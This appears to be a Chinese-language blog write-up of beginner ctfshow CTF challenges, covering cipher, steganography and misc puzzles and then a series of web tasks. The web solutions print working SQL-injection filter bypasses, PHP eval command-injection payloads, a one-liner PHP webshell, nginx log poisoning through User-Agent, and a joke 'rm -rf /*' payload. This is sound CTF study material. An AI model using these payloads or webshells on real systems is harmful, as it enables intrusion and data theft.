【Loading 42/48】ctfshow_WriteUp | _萌新
萌新_密码1
题目
密文:
53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D
提交格式:KEY{XXXXXXXXXXXXXX}
分析
所有字符由数字和 ABCDEF 组成,先用 HEX 解码得到 S1lkZjBhM2ViZDVjNGRjMTYwLUV7ZmI2M2VlMDI5OGI4ZjRkOH0=
。
根据末尾的 “=” 猜测是 Base 系列编码,用 Base64 解码得到 KYdf0a3ebd5c4dc160-E{fb63ee0298b8f4d8}
。
字符串包含 flag 需要的完整大括号,猜测是栅栏密码,将字符串分两栏排列得到原始 flag。
Flag
KEY{dffb06a33eeeb0d259c84bd8cf146d08-}
参考
萌新_密码2
题目
出题人已累,随便敲了几下键盘。。。 rdcvbg 2qase3 6tghu7
flag格式KEY{XXXXXX}
分析
按密文字符串的间隔初步猜测需要词频爆破,但字符串中包含数字,又觉得不太像。根据字符串在键盘上的分布规律,发现三条字符串在键盘上的位置分别围成三个圈。因为给出的字符串中字母均为小写,故将三个圈内的小写字符作为 flag 提交即可。
Flag
KEY{fwy}
萌新 密码3
题目
题目名称:我想吃培根 题目描述: -- --- .-. ... . ..--.- .. ... ..--.- -.-. --- --- .-.. ..--.- -... ..- - ..--.- -... .- -.-. --- -. ..--.- .. ... ..--.- -.-. --- --- .-.. . .-. ..--.- -- -- -.. -.. -- -.. -- -.. -- -- -- -.. -.. -.. /-- -.. -- -.. -.. --/ -- -- -- -- -- /-- -.. -.. -- -.. -- /-- -.. -.. -- 格式:flag{***********}
分析
根据题意,本题考查摩斯电码和培根密码。
先用摩斯电码对密文进行解密,其中分隔符为空格,“/” 处留一个空格后换行,得到解密结果 MORSE_IS_COOL_BUT_BACON_IS_COOLER_MMDDMDMDMMMDDDMDMDDMMMMMMMDDMDMMDDM
结果中 M 与 D 组成的部分显然为培根密码的输入,尝试将 M 与 D 分别替换为 A 和 B,最终通过 AABBABABAAABBBABABBAAAAAAABBABAABBA
得到 flag 内容。
Flag
flag{GUOWANG}
参考
摩斯电码转换_摩斯密码翻译器-在线工具
培根密码解密_培根密码转换器-ME2在线工具
萌新 隐写2
题目
文件的主人喜欢用生日做密码,而且还是个90后。
分析
根据题目,用 Ziperello 进行爆破,条件如下:
爆破出密码 19981000,先不管这串密码像不像生日,解开压缩包得到 flag。
Flag
flag{brute_force}
萌新 隐写4
题目
图片这么好看,但是没啥用呦
分析
用 010 Editor 打开文件,因为前面一般是文件头啥的不好藏信息所以从后往前翻,找到 flag:
Flag
flag{word_stega}
萌新 密码#4
题目
QW8obWdIWF5FKUFSQW5URihKXWZAJmx0OzYiLg==
比base64还大的base
推荐的网站打不开了就没放
分析
虽然但是这一串怎么看都像是 Base64 啊,先解码得到 Ao(mgHX^E)ARAnTF(J]f@<6".
,再用 Base85、Base91、Base92 和 Base100 依次尝试,通过 Base85 解出半个 flag 样的字符串:
整不会了。WP 解法才知道这里的 <
是 HTML 字符实体,实际表示的是小于符号,即实际的 Base64 解码结果为 Ao(mgHX^E)ARAnTF(J]f@<6".
。将其通过 Base85 解码得到 flag。
Flag
flag{base_base_base}
参考
在线工具 - Bugku CTF
HTML 字符实体 < >_ &等-反面東东-博客园
萌新 隐写3
题目
Flag
flag{xinti_gkd}
杂项1
题目
小明想给心爱的妹子表白很久,可是不知道怎么开口,你能帮帮小明吗?
已知 md5(表白的话+ctf)=ed400fbcff269bd9c65292a97488168a
提交flag{表白的话}
md5解密网址:https://www.somd5.com/
解密得到helloctf
helloctf-ctf=hello
提交flag{hello}即可
分析
根据给出的解密网址对 md5 码进行解密:
……title 说得好啊!
Flag
flag{hello}
杂项2
题目
小明终于找到了萌新码,开始了自己的CTF冒险征程。
工具地址:https://www.lanzoui.com/i9h1lfi
提交flag{XXXXX}
分析
题目给的工具是 winhex,咱就直接用 010 Editor 开了。
在十六进制文件末尾找到 flag:
Flag
flag{ctfshow_im_coming}
萌新 杂项3
题目
大家好我是小萌新羽,前不久我的一个朋友给我了一张银行卡,他说里面有一大笔钱,但是他只告诉我他的生日是九七年十月一日,你能帮我猜猜他的银行卡密码是多少吗,哦对,这个朋友有个小名叫小五。
flag格式:flag{银行卡密码}
分析
银行卡密码一般是 6 位,从题目中能提取出的信息一个是生日 “19971001”,一个是 “小五”。九七年十月一日也可能被直接写为 “97101”,将其和 “5” 进行拼接可尝试出 flag。
Flag
flag{971015}
杂项4
题目
小明心爱的图片在压缩包中,可是小明夜深人静的时候,孤枕难眠,想打开图片排遣寂寞,可是忘记了密码了,小米依稀记得9位的密码都是数字,前3位是372,你能帮助小明吗?
工具地址:https://www.lanzoui.com/i9h29li
flag{372XXXXXX}
分析
题目给了个解 rar 压缩包的工具 Advanced Archive Password Recovery,根据题目要求,对压缩包进行爆破:
得到密码:
打开压缩包,里面有个 flag 格式的字符串不是 flag。
Flag
flag{372619038}
杂项5
题目
小明如愿以偿的打开了压缩包,可是眼前的文字自己只能认识FBI,其他的都不认识,而且屏幕出现了一句话,你能帮小明找到这句话的意思吗?
小明如愿以偿的打开了压缩包,可是眼前的文字自己只能认识FBI,其他的都不认识,而且屏幕出现了一句话,你能帮小明找到这句话的意思吗?
FBI No under 18
i was always Fond of visiting new scenes, and observing strange characters and manners. even when a mere chiLd i began my travels, and made mAny tours of discovery into foreiGn
分析
十八禁语段里有突兀的大小写字母,同时存在完整的一对大括号。猜测需要提取所有大写字母:
现在是藏头诗了。
Flag
FLAG{CTFSHOWNB}
杂项6
题目
小明的压缩包又忘记密码了?他去电脑维修店去修,人家扔出来说这个根本就没有密码,是个假密码。小明懵了,明明有密码的啊,你能帮帮小明吗?
分析
根据题目描述猜测是压缩包伪加密,根据之前的经验,将十六进制文件第 4 行的 09 更改为 00 后保存,打开压缩包得到 flag。
Flag
flag{c_t_f_s_h_o_w}
杂项7
题目
小明小心翼翼的打开压缩包,竟然是个图片,什么鬼?
要是图片能继续往长一点该多好啊,小明暗暗的想。
你能帮小明完成这个朴素的梦想吗?
分析
这题的提示可能透题就没开。压缩包里的图片擦边就不放了,把图片的高度拉高就能看到 flag。
Flag
flag{beautiful}
杂项8
题目
小明看完图片老脸一红,心想,我女朋友能有这么瘦就好了。
分析
010 Editor 打开出现报错提示,需要恢复图片。
使用大佬的代码对 crc 进行爆破,得到图片正确的长宽:
更改文件信息,
得到 flag。
Flag
flag{you_are_very_well}
杂项10
题目
小明决定不看小姐姐了,摘掉800度的眼镜,望向这个图片。
分析
用 800 度的双眼看到的图片应该是个黑白的轮廓,摘了眼镜看到五颗獠牙(?
看了大佬的 WP,是“我好喜欢你”。
是三百度不够有性价比吗
Flag
flag{我好喜欢你}
杂项11
题目
小明:怎么又说我???
工具地址:https://www.lanzoui.com/i9hm2di
分析
题目给了个破解图片隐写的工具 Jphswin,Open Jpeg 打开图片,Seek 查看隐写结果。因为题目没有给出多余信息所以直接提交空密码进行破解,保存后得到一个二维码图片:
打开扫出的链接显示 ctfshow 的网站。看链接后的一长串参数像是 Base64 编码,hackbar 解出一个带 flag 头的怪东西,改用 UTF-8 格式解码得到 flag。
Flag
flag{战神归来发现自己儿子在刷题,一怒之下召唤10万将士来报仇}
隐写1
题目
小明决定洗心革面学隐写了
分析
附件打不开,猜测是文件类型被更改了。打开十六进制文件发现文件类型没问题,但文件头的第一个字节是错误的。
将 99 改为 89 保存后得到 flag。
Flag
flag{zhe_ci_meiyou_ctfshow}
隐写2
题目
小明:???
工具:https://www.lanzoui.com/i9hm2di
分析
这题给的工具还是 Jphswin,用它打开题目给的图片提取隐写,提取出的文件用 txt 格式打开得到 flag。
Flag
flag{202cb962ac59075b964b07152d234b70}
【未完成】萌新隐写5
题目
分析
?这破路也能开
【未完成】萌新隐写6
题目
(给了一段音频
web1
题目
代码很安全,没有漏洞。
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
分析
根据注释提示,当 flag 位于 row[1000] 的位置,但直接向 id 大于 999 的数值或是任何转为十进制后大于 999 的值会被过滤。所以可以尝试往里面传一些字符串或者取反等方法绕过。
payload:?id=999%2B1
,%2B 是加号的 url 编码结果。
Flag
ctfshow{f818106e-3459-4b78-8c18-971d2a8707f7}
web2
题目
管理员赶紧修补了漏洞,这下应该没问题了吧?
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
if(preg_match("/or|\+/i",$id)){
die("id error");
}
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
分析
web2 的代码在 web1 的基础上过滤了 “or” 和 “+”,因此我们选择对 1000 进行两次取反后传入。
payload:?id=~~1000
Flag
ctfshow{5084e9f8-de5f-4015-be3a-49811b1cabd8}
web3
题目
管理员被狠狠的教育了,所以决定好好修复一番。这次没问题了。
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
die("id error");
}
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
分析
这次管理员将 “or” “-” “\” “*” “<” “>” “!” “x” “hex” “+” 都进行了过滤,所以 payload:?id=~~1000
Flag
ctfshow{78ee3935-7fd1-48d2-94d9-98f0f8b15247}
web4
题目
管理员阿呆又失败了,这次一定要堵住漏洞
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
if(preg_match("/or|\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
die("id error");
}
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
分析
这次管理员将 “or” “-” “\” “*” “<” “>” “!” “x” “hex” “(” “)” “+” “select” 都进行了过滤,所以 payload:?id=~~1000
Flag
ctfshow{b301e31f-e8c1-4f7f-b3a6-73dfdd92c30f}
web5
题目
阿呆被老板狂骂一通,决定改掉自己大意的毛病,痛下杀手,修补漏洞。
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
die("id error");
}
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
分析
过滤了 “'” “"” “or” “|” “-” “\” “/” “*” “<” “>” “!” “x” “hex” “(” “)” “+” “select”,payload:?id=~~1000
Flag
ctfshow{b58a295a-6b17-4030-86f4-c78b8c8523dd}
web6
题目
阿呆一口老血差点噎死自己,决定杠上了
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|x|hex|\(|\)|\+|select/i",$id)){
die("id error");
}
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
分析
过滤了 “'” “"” “or” “|” “-” “\” “/” “*” “<” “>” “^” “!” “x” “hex” “(” “)” “+” “select”,payload:?id=~~1000
嗯……学到许多
Flag
ctfshow{0eb4a723-f54b-4567-bf6a-fb0d9b6bb446}
web7
题目
阿呆得到最高指示,如果还出问题,就卷铺盖滚蛋,阿呆心在流血。
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['id'])){
$id = $_GET['id'];
if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\^|\!|\~|x|hex|\(|\)|\+|select/i",$id)){
die("id error");
}
# 判断id的值是否大于999
if(intval($id) > 999){
# id 大于 999 直接退出并返回错误
die("id error");
}else{
# id 小于 999 拼接sql语句
$sql = "select * from article where id = $id order by id limit 1 ";
echo "执行的sql为:$sql<br>";
# 执行sql 语句
$result = $conn->query($sql);
# 判断有没有查询结果
if ($result->num_rows > 0) {
# 如果有结果,获取结果对象的值$row
while($row = $result->fetch_assoc()) {
echo "id: " . $row["id"]. " - title: " . $row["title"]. " <br><hr>" . $row["content"]. "<br>";
}
}
# 关闭数据库连接
$conn->close();
}
}else{
highlight_file(__FILE__);
}
?>
</body>
<!-- flag in id = 1000 -->
</html>
分析
好的终于把 “~” 给过滤了,根据源码罗列的关键词,考虑使用进制转换绕过。十六进制数需要的字母 x 被过滤了,尝试使用二进制数 0b1111101000 绕过。
payload:?id=0b1111101000
Flag
ctfshow{a0000beb-dc91-420f-a34c-aee7c522ae02}
web8
题目
阿呆熟悉的一顿操作,去了埃塞尔比亚。
PS:阿呆第一季完,敬请期待第二季!
<html>
<head>
<title>ctf.show萌新计划web1</title>
<meta charset="utf-8">
</head>
<body>
<?php
# 包含数据库连接文件,key flag 也在里面定义
include("config.php");
# 判断get提交的参数id是否存在
if(isset($_GET['flag'])){
if(isset($_GET['flag'])){
$f = $_GET['flag'];
if($key===$f){
echo $flag;
}
}
}else{
highlight_file(__FILE__);
}
?>
</body>
</html>
分析
源码把所有的过滤都撤掉了,当传入的 flag 和变量 key 的值完全相同时得到 flag。但题目并未给出 key 的具体数值。
WP 解法,按照大佬的说法,提示的部分暗示阿呆已经删库跑路了,即 payload:?flag=rm -rf /*
Flag
ctfshow{ce54fcf1-78a0-40f0-8505-efc241be6985}
web9
题目
阿呆在埃塞俄比亚终于找了一个网管的工作,闲暇时还能种点菜。
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(preg_match("/system|exec|highlight/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
分析
代码提到当传入 c 的参数中存在 “system” “exec” “highlight” 这三种命令时将直接作为 php 代码执行,同时提示 flag 位于 config.php 文件中。
payload:?c=system("cat config.php");
执行后在查看器中获得 flag。
Flag
ctfshow{0f2987c0-121b-4381-864f-cf6e1b85d814}
web10
题目
阿呆看见对面二黑急冲冲的跑过来,告诉阿呆出大事了,阿呆问什么事,二黑说:这几天天旱,你菜死了!
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/system|exec|highlight/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
分析
这次的代码将 “system” “exec” “highlight” 三种命令给过滤了,因此需要选择其他的命令函数。
payload:?c=passthru("cat config.php");
Flag
ctfshow{4ae64e4f-e2b1-4648-82d7-750ebdc12724}
参考
web11
题目
阿呆听完自己菜死了,自己呆了。决定修好漏洞,绝对不能让自己再菜死了。
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/system|exec|highlight|cat/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
分析
这题代码在过滤的命令中加入了 “cat”,于是 payload:?c=passthru("tac config.php");
Flag
ctfshow{f5d3fdbd-a99b-4b3b-a5f8-e92ae9bf7f41}
web12
题目
阿呆不慌不忙的拔掉自己所有的菜,以后自己就不会菜死了。
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/system|exec|highlight|cat|\.|php|config/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
分析
这题直接把 flag 的文件名给禁了,我们采用模糊查找。payload:?c=passthru("tac con*");
Flag
ctfshow{bd87ed77-475a-4ff5-aa1b-822904ec1258}
web13
题目
阿呆彻底呆了,阿呆拿起谷姐搜索好久,终于找到更狠的方法。
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/system|exec|highlight|cat|\.|\;|file|php|config/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
分析
这题把 php 代码行末尾的分号也给禁了,看了大佬的 WP 才知道可以直接闭合 php 代码段运行,即 payload:?c=passthru("tac con*")?>
Flag
ctfshow{a524160c-8287-49e0-8334-2343ad2e1eda}
参考
ctfshow-萌新-web13( 利用代码执行漏洞获取网站敏感文件)-士别三日wyx-CSDN
web14
题目
阿呆忍无可忍了,告诉自己,如果还被攻,自己就跳下去
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/system|exec|highlight|cat|\(|\.|\;|file|php|config/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
分析
这题的过滤在前一题的基础上加了一个 “(”,这里使用内敛执行绕过,payload:?c=echo `tac con*`?>
Flag
ctfshow{0d93543c-ba94-4e20-8402-2d0192f1edb3}
参考
web15
题目
人为什么要活着?难道埃塞俄比亚再无我阿呆容身之处?
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/system|\\*|\?|\<|\>|\=|exec|highlight|cat|\(|\.|file|php|config/i",$c)){
eval($c);
}else{
die("cmd error");
}
}else{
highlight_file(__FILE__);
}
?>
分析
这题把 “;” 的过滤去掉了,但加上了 “?” “>”,非常不妙。看了看大佬的 WP,可以通过一句话木马用 POST 请求传入命令操作。
get 请求传入一句话木马 ?c=echo `$_POST[postc]`;
,之后用 post 方式向 postc 传入 postc=cat config.php
,在查看器中获得 flag。
Flag
ctfshow{2c96c6af-5c3a-424f-a4bc-fde162f13d62}
参考
web16
题目
阿呆为了自己的梦想(fulage),决定来一波反向跑路。
<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
$c = $_GET['c'];
if(md5("ctfshow$c")==="a6f57ae38a22448c2f07f3f95f49c84e"){
echo $flag;
}else{
echo "nonono!";
}
}else{
highlight_file(__FILE__);
}
?>
分析
那代码里的 md5 破解了一下得到 ctfshow36d
,即传入 c 的值应该为 36d
。payload:?c=36d
Flag
ctfshow{c2d4e218-342f-41a4-8a23-d257df9acd56}
参考
web17
题目
阿呆终于怀揣自己的梦想来到了故土,凭借着高超的系统垃圾清理(rm -rf /*)技术,很快的阿呆找到了一份程序员工作
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/php/i",$c)){
include($c);
}
}else{
highlight_file(__FILE__);
}
?>
分析
根据 include($c)
猜测是文件包含漏洞。但题目把 php
过滤了,没法直接进行远程文件包含。
WP 解法,这题采用日志包含。说是在 nginx 目录下有个访问日志 access.log,位置在 /var/log/nginx/access.log。先 ?c=/var/log/nginx/access.log
看看文件内容:
172.12.0.5 - - [09/Feb/2024:07:00:02 +0000] "GET / HTTP/1.1" 200 1450 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
172.12.0.5 - - [09/Feb/2024:07:00:21 +0000] "GET / HTTP/1.1" 200 1450 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
172.12.0.5 - - [09/Feb/2024:07:00:21 +0000] "GET /favicon.ico HTTP/1.1" 200 1450 "http://90e13765-792e-46ae-b92d-183428778268.challenge.ctf.show/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
172.12.0.5 - - [09/Feb/2024:07:01:03 +0000] "GET /?c=/var/log/nginx/access.log HTTP/1.1" 200 630 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
172.12.0.5 - - [09/Feb/2024:07:01:03 +0000] "GET /favicon.ico HTTP/1.1" 200 1450 "http://90e13765-792e-46ae-b92d-183428778268.challenge.ctf.show/?c=/var/log/nginx/access.log" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
对比一下请求包:
access.log 文件包含了请求包中的 Host 和 User-Agent 字段。尝试往 Host 字段中传入一句话木马 <?php @eval($_POST['web17']);?>
放行后页面 400 了:
中国蚁剑连接失败。
看来还是得从 User-Agent 字段传入:
传入后通过中国蚁剑连接环境的 access.log 文件。此时文件中的 User-Agent 字段已经包含传入的一句话木马,运行文件后木马将作为 php 代码直接执行,因而可以顺利连接中国蚁剑。
连接后在 /var/www/html/36d.php 文件中找到 flag。
Flag
ctfshow{0993460d-5e36-47f2-9177-69f234dde6fb}
参考
Nginx access.log日志详解及统计分析-Buckletime-CSDN
15. CTFshow 萌新 web集合-LuckMeteor-博客园
web18
题目
阿呆加入了过滤,这下完美了。
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/php|file/i",$c)){
include($c);
}
}else{
highlight_file(__FILE__);
}
?>
分析
和 web17 相比,这题在 php
字段的基础上增加了对 file
的过滤。这对 web17 中用到的方法不造成影响,所以咱故技重施,?c=/var/log/nginx/access.log
查看 access 文件的内容:
172.12.0.5 - - [12/Feb/2024:13:44:41 +0000] "GET / HTTP/1.1" 200 1448 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0"
依旧是包含了 User-Agent 字段。我们向 User-Agent 传入一句话木马 <?php @eval($_POST['web18']);?>
之后连接中国蚁剑,在 /var/www/html/36d.php 文件中找到 flag。
Flag
ctfshow{30db81a6-5b49-4917-8c13-cf6b2091f98f}
web19
题目
用到了解码?果断禁用base,哼
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/php|file|base/i",$c)){
include($c);
}
}else{
highlight_file(__FILE__);
}
?>
分析
和 web18 相比,这题增加了对 base
的过滤。这对 web18 中用到的方法不造成影响。
查看 access 文件 ?c=/var/log/nginx/access.log
:
172.12.0.5 - - [12/Feb/2024:14:06:46 +0000] "GET / HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0" 172.12.0.5 - - [12/Feb/2024:14:09:21 +0000] "GET / HTTP/1.1" 200 1453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36" 172.12.0.5 - - [12/Feb/2024:14:09:22 +0000] "GET /favicon.ico HTTP/1.1" 200 1453 "http://d7b118a0-f46f-4e09-af17-1a1193bf6d8a.challenge.ctf.show/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.123 Safari/537.36"
向 User-Agent 传入一句话木马 <?php @eval($_POST['web19']);?>
。打开中国蚁剑连接服务器,在 36d.php 中找到 flag。
Flag
ctfshow{0fa3b998-b0e2-46ea-b727-31627a11cdee}
web20
题目
百密一疏,竟然还有个rot
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/php|file|base|rot/i",$c)){
include($c);
}
}else{
highlight_file(__FILE__);
}
?>
分析
查看?c=/var/log/nginx/access.log
一句话木马 <?php @eval($_POST['web20']);?>
你懂的。
Flag
ctfshow{b3e06032-545e-4be8-9967-505589787100}
web21
题目
阿呆绝地反击
Flag
ctfshow{a8430350-a129-4585-8ea1-46cf70de709c}
【未完成】web22
题目
还能搞,阿呆表示将直播倒立放水
<?php
if(isset($_GET['c'])){
$c=$_GET['c'];
if(!preg_match("/\:|\/|\\\/i",$c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
?>
分析
这回阿呆直接把路径给禁了,包括 “:” “/” “\” 符号。
参考
regex - why 3 backslash equal 4 backslash in php?-Stack Overflow
获得百分之百的快乐
题目
阿呆开发了自己的博客系统,准备对欺负他的大佬口吐芬芳
<?php
show_source(__FILE__);
error_reporting(0);
if(strlen($_GET[1])<4){
echo shell_exec($_GET[1]);
}
else{
echo "hack!!!";
}
?>
//by Firebasky
分析
<?php
show_source(__FILE__); // 当前文件高亮显示
error_reporting(0); // 出错不报错
if(strlen($_GET[1])<4){ // 如果向1传入值的字符串长度小于4
echo shell_exec($_GET[1]); //通过shell执行1的值的命令并将完整的输出以字符串的方式返回
}
else{
echo "hack!!!"; // 否则输出hack!!!
}
?>
也就是说咱可以向 1 传入长度小于 4 的字符串命令并得到执行结果。先传入 ls
看看当前路径下的文件列表:
根据前几题的经验,flag 大概率在 secretsecret_ctfshow_36dddddddddd.php 文件里。但由于传入字符串长度的限制,cat 命令没法使用了。看了 大佬的 WP 才知道可以创建新文件后匹配为命令执行。
创建一个新文件名为 nl
:
?1=>nl
此时传入的字符串为 >nl
,长度为3,可被执行。同时文件 nl 在文件列表中排首位:
接着匹配列表中首个文件的文件名作为命令执行:
?1=*
此时 nl 文件的文件名被作为 linux 命令执行,即执行命令 nl secretsecret_ctfshow_36dddddddddd.php zzz.php
,使得之后两个文件的内容被按行号输出:
得到 flag
Flag
ctfshow{b018e56a-6f5e-484d-bebc-04b9de63f8f0}
参考
ctfshow萌新计划类web全解 wp-丨Arcueid丨-CSDN
每天一个linux命令(11):nl命令-peida-博客园
【未完成】web23
题目
阿呆觉得最安全的代码就是什么都没有
分析
猜测是文件上传漏洞,新建了个一句话木马文件上传,用中国蚁剑进入后台发现报错。
错误
